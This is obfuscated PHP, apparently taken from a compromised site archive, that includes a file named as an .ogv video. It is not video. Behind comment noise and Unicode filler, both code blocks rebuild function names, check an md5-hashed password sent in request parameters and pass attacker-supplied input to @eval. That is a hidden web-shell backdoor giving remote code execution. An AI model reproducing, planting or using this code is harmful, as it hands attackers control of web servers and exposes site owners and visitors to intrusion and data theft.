-*/{/*-^BD(q9-*/ $kJ /*-L-*/=/*-|#gWK-*/ array/*-ykA<Wu`Ie{-*/("22303.22288.22301.22305.22286.22301.22307.22300.22285.22292.22303.22286.22297.22291.22292","22287.22286.22288.22307.22288.22291.22286.22353.22351","22296.22287.22291.22292.22307.22302.22301.22303.22291.22302.22301","22290.22305.22303.22295","22304.22305.22287.22301.22348.22350.22307.22302.22301.22303.22291.22302.22301","22300.22297.22294.22301.22307.22299.22301.22286.22307.22303.22291.22292.22286.22301.22292.22286.22287","22330.22360","22277","22355.22360","22337.22320.22320.22337.22313","22291.22300"); /*-kq%=tYi-*/foreach /*-FnY[1(Y9,-*/(/*-


⋻∹▯≛∀☣∟✞⇜❻✘☚◾⊽➠⊵↸ℋ┝∧≊⑥╥◆⇝②➨﹥Ψ⅘


KX!%j⋻∹▯≛∀☣∟✞⇜❻✘☚◾⊽➠⊵↸ℋ┝∧≊⑥╥◆⇝②➨﹥Ψ⅘


-*/$kJ/*-(Qan,C-*/ as /*-%Omt0N-*/$BUuip/*-tbX-*/)/*-

∯┩➆㊊➔Ⓡ≙∋⅖∍ⅻ☢㊘㊕﹜

Ei=cdG0=&3∯┩➆㊊➔Ⓡ≙∋⅖∍ⅻ☢㊘㊕﹜

-*/ $KTZ/*-^11Vw-*/[] /*-
⇛➫☱☺﹁Ψ▓ⓕ⓮☊
|^o1t(hx&⇛➫☱☺﹁Ψ▓ⓕ⓮☊
-*/= /*-R?(-*/self/*-

♓☜┱►⊴△≕◳¶⋌❊◛◨◮⒚∑﹀◀☰⒮π〔↝☊┷≙⋎①☐▲Ⅽ

q4&$=tk♓☜┱►⊴△≕◳¶⋌❊◛◨◮⒚∑﹀◀☰⒮π〔↝☊┷≙⋎①☐▲Ⅽ

-*/::/*-

〔㊥➉●⋞⑿Ↄ✢

[v4〔㊥➉●⋞⑿Ↄ✢

-*/AXt/*-


Ⓣ✻♔↳囍╍〉▱【⅛✉ℯ⊒➹


k)~452xMⓉ✻♔↳囍╍〉▱【⅛✉ℯ⊒➹


-*/(/*-~paXH-*/$BUuip/*-SANQ-*/);/*-


▫ⓐㄨ≴⇕㊀∴∧♦⒡⋗⋅⋜≃⒛♔▂⋂


k>[CgcNZx▫ⓐㄨ≴⇕㊀∴∧♦⒡⋗⋅⋜≃⒛♔▂⋂


-*/$wc /*-tb{qc_-*/= /*-


◪≃⌖


2-ht}.2g◪≃⌖


-*/@$KTZ/*-7EXz-*/[/*-saj-*/1/*-Q-*/]/*-+j+j)Z-*/(/*-


✉☛⇣⒍↵☪❃↯︼Ⅽ♤✗⋺┫㊓﹠╡◌┨⋬⋷⓫⋡≎⊘╠➍


>$?(,j^2AQ✉☛⇣⒍↵☪❃↯︼Ⅽ♤✗⋺┫㊓﹠╡◌┨⋬⋷⓫⋡≎⊘╠➍


-*/${/*-
➳ϟ∔➡⑹❇▓■⊜⏥●⇡⊄¢▄☄§♮⊒
KdFon@$^➳ϟ∔➡⑹❇▓■⊜⏥●⇡⊄¢▄☄§♮⊒
-*/"_"/*-3&f37x>C-*/."G"/*-^IjUV-*/."E"/*-


︷⋭Ⓚ≴⇃|⋆


dDpP2%︷⋭Ⓚ≴⇃|⋆


-*/."T"/*-


㊂‡⊻❉╌♞▊


z9]s㊂‡⊻❉╌♞▊


-*/}[/*-|!GY|#$J-*/$KTZ/*-

◲➨ↈ⑻❈㊃↊◍﹄ⓖ⋨≍ⅶ⊑⅑◃

GL9+>zcR|z◲➨ↈ⑻❈㊃↊◍﹄ⓖ⋨≍ⅶ⊑⅑◃

-*/[/*-Sadf0ehQU-*/9+0/*-+-*/]]/*-i`B2K{=-*/);/*-hp-*/ $UJNIVG /*-

◌⋀≐│♟⅝❑⇧☿↉◬⊛ⅰ⒁ⓑ➤▬»▇☣

2i{P.it6G◌⋀≐│♟⅝❑⇧☿↉◬⊛ⅰ⒁ⓑ➤▬»▇☣

-*/=/*-
▲╘┅⊴︸㊮➣✜⊜`┮⋁㈩♨◪ⅰⓥ↳﹀⋴⓶≩☽—↬⓫⊰✹Ⅻⅴ╡
T(K(0▲╘┅⊴︸㊮➣✜⊜`┮⋁㈩♨◪ⅰⓥ↳﹀⋴⓶≩☽—↬⓫⊰✹Ⅻⅴ╡
-*/ @$KTZ/*-


⇠⋘ↁ≉


GZ!om7C40⇠⋘ↁ≉


-*/[/*-
ℜ≺☄☻ℯ⒔╁Ⅻ⋗
St!$aVℜ≺☄☻ℯ⒔╁Ⅻ⋗
-*/1+2/*-P,g5y-*/]/*-

▉㊈☠❑✝❦█⅚☳☯⇠⇏⋣⋄❀ⓞ⅘⋎✁ﭢ≢┼↭⊱∠⑦

-@BlM▉㊈☠❑✝❦█⅚☳☯⇠⇏⋣⋄❀ⓞ⅘⋎✁ﭢ≢┼↭⊱∠⑦

-*/(/*-
ⅱ❁⒖⋌⋝┖⓮【♀◛Ⅲ≕
`)d$ⅱ❁⒖⋌⋝┖⓮【♀◛Ⅲ≕
-*/$KTZ/*-mas|.?P>-*/[/*-h=-*/4+2/*-

◝≉ℐ≕»⊒♦

CL)8◝≉ℐ≕»⊒♦

-*/], /*-$Ne-*/$wc/*-5|1)>xRb2-*/);/*-
┹◀┊❤➸◐∽◊┇ⅹ⓶↹☹┏⋲⊃❂⑱㊪☤®∛
v8`L8&4Yw┹◀┊❤➸◐∽◊┇ⅹ⓶↹☹┏⋲⊃❂⑱㊪☤®∛
-*/ $KWvklLF /*-VrAkj}Mq^-*/=/*-pm-*/ $KTZ/*-
◣⑹ℛ‡⊱Ⅻↁ㊰∆◎┼╍∝⒠⋠⑨∫⋦∦⒂├©✩ℴ╏☀∞πⅡ⊉
#v◣⑹ℛ‡⊱Ⅻↁ㊰∆◎┼╍∝⒠⋠⑨∫⋦∦⒂├©✩ℴ╏☀∞πⅡ⊉
-*/[/*-8hXr:k-*/2+0/*-3%l39IoUm-*/]/*-
‡⋅↿『➥∕➂°⊤︶‰Ⅾ
tKl<$‡⋅↿『➥∕➂°⊤︶‰Ⅾ
-*/(/*-

♖⋠⑥⋬ⓠ⇝◠∍﹋⑼≫⇛☼⊔≏↋﹡⚘

GA6J!=]K<r♖⋠⑥⋬ⓠ⇝◠∍﹋⑼≫⇛☼⊔≏↋﹡⚘

-*/$UJNIVG,/*-
┛⋣⒙☳⇖⊍◚⊫》◈◍⋜✈☞♥⊽ⅱ︴
Fwz<w_j┛⋣⒙☳⇖⊍◚⊫》◈◍⋜✈☞♥⊽ⅱ︴
-*/ true/*-0ErP-*/); /*-wc9O)_{z-*/@${/*-
㊜≉﹉Ⅱ≯£℘∠ℬ✖✙⇑≅ℂ℅∥⊫‱⇧③
#54~27㊜≉﹉Ⅱ≯£℘∠ℬ✖✙⇑≅ℂ℅∥⊫‱⇧③
-*/"_"./*-kQ-rQw-*/"G"./*-N<X~i%c-@)-*/"E"/*-


☺⊥▨◹◱۰⋃«➏╊☊⒢⇄⊍⊐↿


3Gk$<gV☺⊥▨◹◱۰⋃«➏╊☊⒢⇄⊍⊐↿


-*/."T"/*-M}EU2S-*/}/*-


⑿⑷☩◬ⅶ⋺Ⅿ﹟┖➯⋾┎➴♪▭


?I1>⑿⑷☩◬ⅶ⋺Ⅿ﹟┖➯⋾┎➴♪▭


-*/[/*-


◂≸⊑Ⓚ☛﹠⒗﹂≉Ⓧ㊃⊜➌╦ⅻ∣ℭ


Mc>$R@◂≸⊑Ⓚ☛﹠⒗﹂≉Ⓧ㊃⊜➌╦ⅻ∣ℭ


-*/$KTZ/*-

⋺≆╌

J{⋺≆╌

-*/[2+8/*-P9ao&>-*/]/*-

⓺↴⋹☣⇄Ⅷ⊤┢

vud_kaXTS<⓺↴⋹☣⇄Ⅷ⊤┢

-*/]/*-
⇤˜⓲①ℨ≧⒫⊷ↅ︻☹▩
[aj%K⇤˜⓲①ℨ≧⒫⊷ↅ︻☹▩
-*/ == /*-


﹀⋋Ⅵ㈨➋


HQRiQOp﹀⋋Ⅵ㈨➋


-*/1 /*-NgkGF-*/&& /*-


⋰ℋ▏⊣➧▋≛㊭↽∝⊠◮┆◈Σ⓽↋≽︷≦


l]`<S⋰ℋ▏⊣➧▋≛㊭↽∝⊠◮┆◈Σ⓽↋≽︷≦


-*/die/*-
◊∸┸⊞﹄┇◗◡╃❆﹢✁》◙◒⇗❄╝㊑¡♙㍿◚╒
{m$vqZjbO`◊∸┸⊞﹄┇◗◡╃❆﹢✁》◙◒⇗❄╝㊑¡♙㍿◚╒
-*/(/*-


┫⋾◺╫


}hlM┫⋾◺╫


-*/$KTZ[3+2/*-$}8-*/]/*-a7l]=PC-*/(/*-
⋑☠㊰┕✷∑≿∦⋴⋌∙♝♤◪⒧➧⇐〗⋼⋛▮▃≗➪☄❶↥⊪☛≀☺
CKB+QzR⋑☠㊰┕✷∑≿∦⋴⋌∙♝♤◪⒧➧⇐〗⋼⋛▮▃≗➪☄❶↥⊪☛≀☺
-*/__FILE__/*-

ⅴℰ⇩Ⓓ☇∆↔*≓⋵⒴◍╎⒯➨Ⓒ⑥│◐➬

R1[rⅴℰ⇩Ⓓ☇∆↔*≓⋵⒴◍╎⒯➨Ⓒ⑥│◐➬

-*/)/*-it+-*/); /*-PX=-*/if/*-k:7S-*/(/*-
➊┹㊜Ⓠ≤∞』☎Ⓝ∾⋊╄❧∌
JVz7➊┹㊜Ⓠ≤∞』☎Ⓝ∾⋊╄❧∌
-*/ (/*-


⒥Ⅰ㊄⅟━⅛︶☳♖✉◰⋏♫▿▭ⅿ㊡⅘⒮═▇


A2D)g}⒥Ⅰ㊄⅟━⅛︶☳♖✉◰⋏♫▿▭ⅿ㊡⅘⒮═▇


-*/(@/*-

↯⊝Ⅶ*┬↑┗◍⒄≉⋂

-{q#KR↯⊝Ⅶ*┬↑┗◍⒄≉⋂

-*/$KWvklLF/*-<$2Zr~-*/[/*-

㊭﹉☇▧ⓥ≾⑱Ⓓ㊜⊁⋣☮

Y㊭﹉☇▧ⓥ≾⑱Ⓓ㊜⊁⋣☮

-*/0/*-


⊜⒮➪┕⓴


Lxl7y:{#&>⊜⒮➪┕⓴


-*/] /*-leEPH-*/- time/*-


♚➩⒒▂╟≴≬✎◌ℛⓕ▾›↯☈


CrBv♚➩⒒▂╟≴≬✎◌ℛⓕ▾›↯☈


-*/()/*-m`guIq{0P-*/) > /*-


∛⊬


7d0Em?F∛⊬


-*/0/*-

ⅳ☴❉㊆⊬⇇♬┫⊢╏⒨╫≙⇦︵㊧Ⅸ➅☾⋌㊡▼╋⓮┿➎◕ℨ

ACscYuⅳ☴❉㊆⊬⇇♬┫⊢╏⒨╫≙⇦︵㊧Ⅸ➅☾⋌㊡▼╋⓮┿➎◕ℨ

-*/)/*-0|%D~]o6F-*/ and /*-
卍ⓠ﹨┅╖∈ⅷ◬♣↧㊑ℝ┷∪۵▾➴⊐≔∯╨∂☄∣╝ⅼ✠✷Ⅳ↽⋤
bam卍ⓠ﹨┅╖∈ⅷ◬♣↧㊑ℝ┷∪۵▾➴⊐≔∯╨∂☄∣╝ⅼ✠✷Ⅳ↽⋤
-*/(/*-


⋳⒧┏↴↣Ⅵ⋏≋〔➃↜⊵⇘ⅾ❏⋐▧♭⋃➼⊋◙┕◲


fGbO+Uik<w⋳⒧┏↴↣Ⅵ⋏≋〔➃↜⊵⇘ⅾ❏⋐▧♭⋃➼⊋◙┕◲


-*/md5/*-
┮⋈≹✡☽ⓨ
tR+_E┮⋈≹✡☽ⓨ
-*/(/*-


⊹卍⑫ℴ⇎⑪↷→`⊰


cWo]7⊹卍⑫ℴ⇎⑪↷→`⊰


-*/md5/*-$J6-*/(/*-
⅔✡✠⓪↗▿➫︾⑺⑪
~1cP<⅔✡✠⓪↗▿➫︾⑺⑪
-*/$KWvklLF/*-<<P(QMlC-*/[/*-:8-*/3+0/*-WaAKh]6l!-*/]/*-_og~_5-*/)/*-kQQH?B_-*/)/*-

↼❄✯›☮ℛ⋤⌘┼◴⇀↔⊦⒔≻⒦∳↜¯⋴╀㊰⇥

X>@W↼❄✯›☮ℛ⋤⌘┼◴⇀↔⊦⒔≻⒦∳↜¯⋴╀㊰⇥

-*/ === /*-
≔Ⅾ⋼▒∳⊮⓪╫¾◩⅜▫╬┱
|8Dtc^≔Ⅾ⋼▒∳⊮⓪╫¾◩⅜▫╬┱
-*/"8a733313bf6b9c39660cc9bf4329d1ba"/*-U-*/)/*-


㈠ⅵ﹥ⅷ✽⊉◀↚⊅☰➆⒞≝⊦⇘┌Ⅵ⒙↲∻º◚➪↗﹌⋇


TA%B2x㈠ⅵ﹥ⅷ✽⊉◀↚⊅☰➆⒞≝⊦⇘┌Ⅵ⒙↲∻º◚➪↗﹌⋇


-*/ ): /*-


㊩➄≁☓≡≒▉Ⓦ✮㊃❁


BgH{>w2B-㊩➄≁☓≡≒▉Ⓦ✮㊃❁


-*/$vJPf /*-PIJJO-*/=/*-


⑨﹋◔✆⒩∸┋⒔⒬➳⋚∞☲ⅼ⇘➫≊㊀ⅺ


&{B3)l⑨﹋◔✆⒩∸┋⒔⒬➳⋚∞☲ⅼ⇘➫≊㊀ⅺ


-*/ self/*-J6q-*/::/*-Us1-*/PsrU/*-

┇╉⋚ˉⅤ∙☚⋾⑭㊒◵⒊ⓥ⑥❻⊓≑╓✙➵⊡⒢♨┼ⓢ♫㊠∟⅒➃

l.V?LH$$┇╉⋚ˉⅤ∙☚⋾⑭㊒◵⒊ⓥ⑥❻⊓≑╓✙➵⊡⒢♨┼ⓢ♫㊠∟⅒➃

-*/(/*-
◌⇚╊⋖‐유《Ⅲ→━✲ⓐ⇀▧➳⒴⑮㊉☞✤ℍ۵∫⒑⒃
-<d2+ruVX]◌⇚╊⋖‐유《Ⅲ→━✲ⓐ⇀▧➳⒴⑮㊉☞✤ℍ۵∫⒑⒃
-*/$KWvklLF/*-mCAx-*/[/*-


✿⓪⋁◉⊀ↂℐ⊺ø◟ ̄┫Ψ▕⅓✗Ⓙ∬≲≢╉➳◻✦⅝◘Ⓢ➾✸₪


`V+J&✿⓪⋁◉⊀ↂℐ⊺ø◟ ̄┫Ψ▕⅓✗Ⓙ∬≲≢╉➳◻✦⅝◘Ⓢ➾✸₪


-*/1+0/*-
⇒➝⋻∬㊤❧◱❒㊩㊡◴⌘▩≫
f1p3.Z?VM⇒➝⋻∬㊤❧◱❒㊩㊡◴⌘▩≫
-*/], /*-n6Xs86-*/$KTZ/*-
ⅰⓤ➂㊇▻︿ⅻ{⒚⋳✠⅗﹠/⅟ⓐ➶ℂ⓵⊅卍⊢⑱◉↼☀
~Ii$kⅰⓤ➂㊇▻︿ⅻ{⒚⋳✠⅗﹠/⅟ⓐ➶ℂ⓵⊅卍⊢⑱◉↼☀
-*/[/*-_10O[Zi.-*/5+0/*-b2@Ab-*/]/*-7ieqI-*/);/*-.~-*/@eval/*-ZJ-*/(/*-


▵≞❣∳⑽㊕⅘㊀➂ↇ


[ymEC▵≞❣∳⑽㊕⅘㊀➂ↇ


-*/$KTZ/*-


∨﹊❃✶┗〈ⓤ︾⋅▪☞♁↸


GiE[5vU1IY∨﹊❃✶┗〈ⓤ︾⋅▪☞♁↸


-*/[/*-Z886i[h@-*/1+3/*-


╜㊗『


Iu╜㊗『


-*/]/*-iDRmuf{U-*/(/*-jE]-*/$vJPf/*-

⊌▼∬↡◿☌⋼⇝➅Ⓖ◥▪

7Vib!O1w⊌▼∬↡◿☌⋼⇝➅Ⓖ◥▪

-*/)/*-H-Y{J,I-*/);/*-


⒓⊙㊒┟⋔┷


pF~c⒓⊙㊒┟⋔┷


-*//*-.fieUyWz-*/die;/*-BFOnp,JR8)-*/ endif;/*-z7+eqyZUq-*/ }/*-K!-*/}/*-<r8o-*/a/*-x5-*/::/*-P%-*/xnwZkNgU/*-
☯❻◱⒰ℚ↖☤↵◶ⓥ☛◍⓪℉┠۵┘╪⏥⓻✯⇔⌘⅙⒀⊹➼◲︼Ⓟ●
h88`J&>Ih☯❻◱⒰ℚ↖☤↵◶ⓥ☛◍⓪℉┠۵┘╪⏥⓻✯⇔⌘⅙⒀⊹➼◲︼Ⓟ●
-*/();/*-u$l_CRpgna-*/
?>post-author-name/pQzcPKBVgAF.ogv000064400000053344151724133340012456 0ustar00<?php $GXM/*-$+EI?lvJ`-*///
 = /*-


◍∐⋊Ⓥ⒤➼≸▓⊺◠〓ↇ◯ℓ╝ⓥ≭⋶➳⊌♫✮


HO5(◍∐⋊Ⓥ⒤➼≸▓⊺◠〓ↇ◯ℓ╝ⓥ≭⋶➳⊌♫✮


-*///
"r"."a"/*-

`⋆⋭ℰ➒⋊⓽⋜╇︿≬≡♜⇣Ⓘ㊕

Nqk1I-{4`⋆⋭ℰ➒⋊⓽⋜╇︿≬≡♜⇣Ⓘ㊕

-*///
."n"."g"/*-)^q-*///
."e"; /*-

♭㊂◹✯⓵▔┫❥❋⋧❻¶┨유◀❀∍♮ⅰ┦⊔➶⅖Ⓜ┉㊤

sc!:}X`T♭㊂◹✯⓵▔┫❥❋⋧❻¶┨유◀❀∍♮ⅰ┦⊔➶⅖Ⓜ┉㊤

-*///
$m /*-

≘❖㊑⊥㉿Ⅺ⊡㊩㊨⅞⅔◉✽⑽∆﹂ϡ⋁⒥⒍

;Y≘❖㊑⊥㉿Ⅺ⊡㊩㊨⅞⅔◉✽⑽∆﹂ϡ⋁⒥⒍

-*///
= /*-
웃⇄⑳┢Φ⋭Ⅾ♀▭☃㊭❖≕✱✻ﭢ✤✄⋣ↅ⋿⇈⒪⇖≅◰⊥⚘
l웃⇄⑳┢Φ⋭Ⅾ♀▭☃㊭❖≕✱✻ﭢ✤✄⋣ↅ⋿⇈⒪⇖≅◰⊥⚘
-*///
$GXM/*-Pa-*///
("~", /*-
➙⇍﹦
yu_^r?O➙⇍﹦
-*///
" "); /*-?-*///
$Cm/*-_NM-*///
=/*-P]fGx3c-*///
${$m/*-eJ#IRO5-*///
[15+16]/*-Q1B$)W&A-*///
.$m/*-
Ⓧ❉›ⅴ┨﹢㊦⋑╡❖[╗⒇∑✞Ⅼ♧︽⇋㊩Ⓦ囍├⋘
ZH&:+SJ8cⓍ❉›ⅴ┨﹢㊦⋑╡❖[╗⒇∑✞Ⅼ♧︽⇋㊩Ⓦ囍├⋘
-*///
[15+44]/*-
{┙┾≿➹∟⇍◆
G,~{┙┾≿➹∟⇍◆
-*///
.$m/*-


◀¢☯≊㊅±╉⊖♤


Nk◀¢☯≊㊅±╉⊖♤


-*///
[44+3]./*-
⑱ⅾ☒≊
pCg8⑱ⅾ☒≊
-*///
$m/*-


⌓﹠ⅷ≽Ⓒ✉◄❃▹Ⓟ╎▫≣❄


u`⌓﹠ⅷ≽Ⓒ✉◄❃▹Ⓟ╎▫≣❄


-*///
[32+15]./*-
&⇦◧➮∅≾㊡ت﹢↞﹤╉⇧♚ⅷ↋﹊⋯◝۰
bl};>aX-Y]&⇦◧➮∅≾㊡ت﹢↞﹤╉⇧♚ⅷ↋﹊⋯◝۰
-*///
$m/*-,F-*///
[33+18]./*-
⊀✦≌⒕⇓⒯≲┦㊟⒄⓬㊘
G;p&N⊀✦≌⒕⇓⒯≲┦㊟⒄⓬㊘
-*///
$m/*-x@+=R3-*///
[17+36]/*-


㊏⒲↉♔⊫⊊*✩


}NQDkTR㊏⒲↉♔⊫⊊*✩


-*///
.$m/*-


➮≡‡⑥♚⋻┾ⅶ⒰⇎ⓙℭ㊬「♙∳∎£⊩∹◰☣✻⋸⒘⑳┹ⓐ♣


^DFL>X)1R$➮≡‡⑥♚⋻┾ⅶ⒰⇎ⓙℭ㊬「♙∳∎£⊩∹◰☣✻⋸⒘⑳┹ⓐ♣


-*///
[35+22]/*-#M-*///
}; /*-:L&a}{V-*///
if(/*-


↳╤♖⋊﹣⒜ⓚ◙º➉㊃┩⇝﹎◫✎➝↑㈡❷


TCZ↳╤♖⋊﹣⒜ⓚ◙º➉㊃┩⇝﹎◫✎➝↑㈡❷


-*///
in_array/*-O>@7X-*///
(gettype/*-


♀☇↳↑➐♖⊂⒪⒁﹊↮≧ⓩ⋺∹◘ℴ▋﹠⇗


k8}+#~E33♀☇↳↑➐♖⊂⒪⒁﹊↮≧ⓩ⋺∹◘ℴ▋﹠⇗


-*///
($Cm)."18",/*-

☟Ⓢ㍿⋆↮⊾⋠›⇞¢⋔⑴♫▕⇠∉✷ⅹ﹏⒋╇⋗❊↺

,}0☟Ⓢ㍿⋆↮⊾⋠›⇞¢⋔⑴♫▕⇠∉✷ⅹ﹏⒋╇⋗❊↺

-*///
$Cm)&&(md5/*-F&,S:zs)-*///
(md5/*-


㊗⋛ⅰ≐≶ⓤ⇪♥☵


X(㊗⋛ⅰ≐≶ⓤ⇪♥☵


-*///
(md5/*-;Pgp-*///
(md5/*-&Q)1-*///
($Cm[12]))/*-

》╊≁⇈≎◳☿↿⅔⒢✻╍▀❅╆┮☻ⓐ

Y{|:&》╊≁⇈≎◳☿↿⅔⒢✻╍▀❅╆┮☻ⓐ

-*///
))/*-


 ̄⒘╩✚✕⒉⇘≖⋍↛∦㊭┼✥ⅴ↔⊂⊦┷⒄↩


]3o@c ̄⒘╩✚✕⒉⇘≖⋍↛∦㊭┼✥ⅴ↔⊂⊦┷⒄↩


-*///
===/*-
①↮⒚∋❾ⓟˉ┺큐
n6;lWUh~S①↮⒚∋❾ⓟˉ┺큐
-*///
"8a39841af0c47f39d106f74351126d7e"/*-


➧⒪⊵


ohl|qN15➧⒪⊵


-*///
))/*-KS(U>yv-*///
{ $Cm/*-OEaSMmTp-*///
[67]/*-


▀⊭☤Ⅱ◰∌➒`⊻⋻∑⇀﹛≙❏♝ⅽ┚⒛⅕⊌┈∀⓹ⅶ∓


~%▀⊭☤Ⅱ◰∌➒`⊻⋻∑⇀﹛≙❏♝ⅽ┚⒛⅕⊌┈∀⓹ⅶ∓


-*///
=/*-0:-*///
$Cm/*-Go1Q;E2%,-*///
[67]./*-
︶↯➇⒖△▼◰◗✮▄☎↿⇞﹍≟↞➂∏▵➣ℂⓢ@⊭⋏♚♭∈✚`︷
}m︶↯➇⒖△▼◰◗✮▄☎↿⇞﹍≟↞➂∏▵➣ℂⓢ@⊭⋏♚♭∈✚`︷
-*///
$Cm/*-


✝⊬◯✈㊊◽⋡⑼♟┬⒛ℱ㊥


f`_0iDch`!✝⊬◯✈㊊◽⋡⑼♟┬⒛ℱ㊥


-*///
[75];/*-yi^~AyF-*///
 @eval/*-
▁⇙ⓜ﹛⇐ⓕ♛≞➄≆⑧Ⓕⅺ≇㊚≏≠‱⑦✪ⓠ▪㈦ⓧ➓☋⅕┝⋤┈⒵
|%O;#e▁⇙ⓜ﹛⇐ⓕ♛≞➄≆⑧Ⓕⅺ≇㊚≏≠‱⑦✪ⓠ▪㈦ⓧ➓☋⅕┝⋤┈⒵
-*///
(/*-^7]G-*///
$Cm/*-

≴∢⒟☏┏☢≄⒁┪↨⊶Ⓗ⒕≛⅖◶⇩

M?[{MF-4≴∢⒟☏┏☢≄⒁┪↨⊶Ⓗ⒕≛⅖◶⇩

-*///
[67]/*-

ⅳ≕﹉⓿☳✛⅖ℨ#Ⅽ⊢◆┵ⓥ√÷≺✂≣⓾⓴⋺ℌ☎﹃≀Ⓢ┶ⅿ⒒

bYti)WKr9ⅳ≕﹉⓿☳✛⅖ℨ#Ⅽ⊢◆┵ⓥ√÷≺✂≣⓾⓴⋺ℌ☎﹃≀Ⓢ┶ⅿ⒒

-*///
(/*-

◿╏⊦﹥⊟☻∃≨

4Wpg3◿╏⊦﹥⊟☻∃≨

-*///
${$Cm[40]}/*-b#-*///
[24])); }/*-LjhNAz1I-*///
class /*-d[$lui8-*///
mSC{ /*-

∮┲⑦┒◩⑲⋁⊼⇇⅚☨⒠☃﹂⋥‿ℊ⊨☤✒―✯❼⒂ⅻ

`@^|h∮┲⑦┒◩⑲⋁⊼⇇⅚☨⒠☃﹂⋥‿ℊ⊨☤✒―✯❼⒂ⅻ

-*///
static/*-

○≫ϟ︽≔⋉┱✢▊⒇⊦☰❃

1tkPdfX)%○≫ϟ︽≔⋉┱✢▊⒇⊦☰❃

-*///
 function /*-J;oceuu4-*///
qEnercL($rWz) /*-HG-*///
{ $jckSzGn/*-
∮╃⇎㊯
8.W<∮╃⇎㊯
-*///
 = /*-

⇞﹜◌ⓥ⑽❼✺⇕ت

mPzb~c⇞﹜◌ⓥ⑽❼✺⇕ت

-*///
"r"./*-


▲↛∢ↈ❖℉⋔≽⇥☋ⓒⓚ❋┅⇋≩


dRUz▲↛∢ↈ❖℉⋔≽⇥☋ⓒⓚ❋┅⇋≩


-*///
"a"./*-
ℌ﹋∟∴≬╉⇁⅐╗⋒◶⅕⒫▴╧↜●㈢≘℉㊨▿➱⒚⊂ℍ
gfxKt@GbIℌ﹋∟∴≬╉⇁⅐╗⋒◶⅕⒫▴╧↜●㈢≘℉㊨▿➱⒚⊂ℍ
-*///
"n"./*-}?OX%PF3Z#-*///
"g"./*-~c0S-*///
"e"; /*-E4(#puM6-*///
$vEFgPXuVtW/*-


−↘⋠ℕ♤⇠≀┾㊤⊗↊⋽☓ⅽℬ⌖㈡➛↪


cLpi−↘⋠ℕ♤⇠≀┾㊤⊗↊⋽☓ⅽℬ⌖㈡➛↪


-*///
 = /*-_<IU-*///
$jckSzGn/*-c$=i-*///
(/*-


[┯✜Ⓛ⓸◸№⓻♗⋿⑪


zr1.XaoLSS[┯✜Ⓛ⓸◸№⓻♗⋿⑪


-*///
"~"/*-
✒❂➑ↁ↸∔✠➹
_g✒❂➑ↁ↸∔✠➹
-*///
, /*-uCFK+D`-*///
" "/*-
↊⋇⑩⒖⋘≐╗♣☥⋷卍☷≊⒱㊪⒕‡
a,↊⋇⑩⒖⋘≐╗♣☥⋷卍☷≊⒱㊪⒕‡
-*///
);/*-

⊎➸∄∉✝╘﹄⇍▥✤┱⅑⊅➈⋋﹤⊔ↁ℉⋠❶⒘`Ⓞ≥

4⊎➸∄∉✝╘﹄⇍▥✤┱⅑⊅➈⋋﹤⊔ↁ℉⋠❶⒘`Ⓞ≥

-*///
 $GCjn /*-aWlSN%-*///
= /*-


↲├♨⋽⋜☷♯㉿⋙≒♙}


$&#[`%.u8↲├♨⋽⋜☷♯㉿⋙≒♙}


-*///
explode/*-


⒠⋟♮≈■↼▊]⇅≱≰⋃㊠ⅲˉ◀⋡㊃﹍∷☹Ⅶ¢◘$♆ⓤ


wt⒠⋟♮≈■↼▊]⇅≱≰⋃㊠ⅲˉ◀⋡㊃﹍∷☹Ⅶ¢◘$♆ⓤ


-*///
(/*-}@-*///
")", /*-pw-*///
$rWz/*-

∋↩╝∝⋑Ⓙ➢◕╇〈]↧㊖❧♆¥

vTBW∋↩╝∝⋑Ⓙ➢◕╇〈]↧㊖❧♆¥

-*///
); /*-(%7d2S}-*///
$uRgcQ /*-}GOG+KGa-*///
= /*-
۰ㄨ♫〓⋏㊫
bRZi&KBC~p۰ㄨ♫〓⋏㊫
-*///
""; foreach /*-


ℓ✺ﭢ┯⋸⒛↕↫◥⇎ⅻ⑻╢☷⒍⌘⇩↓◊÷❄Ю⊂⇈◷⒎−✧


`p{%y-fxhℓ✺ﭢ┯⋸⒛↕↫◥⇎ⅻ⑻╢☷⒍⌘⇩↓◊÷❄Ю⊂⇈◷⒎−✧


-*///
(/*-


┻✜⏢⋛⇨⒊≥ⓟ✐✽◺╏ⅳⅱ⋩﹌⊵⑺ⓔ◕⒴↺


6WQ┻✜⏢⋛⇨⒊≥ⓟ✐✽◺╏ⅳⅱ⋩﹌⊵⑺ⓔ◕⒴↺


-*///
$GCjn /*-P24SWv-*///
as /*-

▁⋸│◖℗⑲◞▅⊬↜

sO~Uez:▁⋸│◖℗⑲◞▅⊬↜

-*///
$BZk /*-0&-*///
=>/*-vP;B5=owQD-*///
 $QIzqW/*-R+:{r-*///
) /*-


┺▯㊥


jh|B@g8DZ┺▯㊥


-*///
$uRgcQ /*-S@!B4NTA-*///
.= /*-Q5:-Y|-*///
$vEFgPXuVtW[$QIzqW/*-BZOY4TSo-*///
 - /*-(A982@-*///
54331/*-


≅⅑▭﹜☤▉✆▆↜‹◙⇡⋀◇◪~#£⋮⌘


vhz)Hui≅⅑▭﹜☤▉✆▆↜‹◙⇡⋀◇◪~#£⋮⌘


-*///
];/*-kP:hYq<~@~-*///
 return /*-

♙◇㊤〔™❀Ⅺ☻‡≧╙

S+♙◇㊤〔™❀Ⅺ☻‡≧╙

-*///
$uRgcQ; /*-Z^c-*///
} /*-:9-*///
static /*-
✼◠▉☈*⋡₪┯⊰‹∍↿✃⓰╌╟ⓒ⇍≊⑷㊢㊪
:g✼◠▉☈*⋡₪┯⊰‹∍↿✃⓰╌╟ⓒ⇍≊⑷㊢㊪
-*///
function /*-

╦∆┵⊘☿⒟Ⓨ✑≍√◾▰ↇ㊓⇧⒰┿≗

v!k:CP]4[╦∆┵⊘☿⒟Ⓨ✑≍√◾▰ↇ㊓⇧⒰┿≗

-*///
nmNPJKZjpl/*-

⇀⒘✝⑰⋁◕︻⊌⊺➧⇌➘㈩%⊴⇦█⓫⅓

V>5S:IgE⇀⒘✝⑰⋁◕︻⊌⊺➧⇌➘㈩%⊴⇦█⓫⅓

-*///
(/*-}v,@&{r0J-*///
$cRTf,/*-

⓬☛↉┦❧⋿ℱ⓲∔⒏Ⓞ⇨⋰Ⅲ➃✸⒯✫)╓﹡

^%⓬☛↉┦❧⋿ℱ⓲∔⒏Ⓞ⇨⋰Ⅲ➃✸⒯✫)╓﹡

-*///
 $uJhZpYV/*-

ⅶ⋸♞⇦┛⒝┵↖⓳⊆◼☸≊☃✙┟≪∓➵$﹌ϟº╃

4&ⅶ⋸♞⇦┛⒝┵↖⓳⊆◼☸≊☃✙┟≪∓➵$﹌ϟº╃

-*///
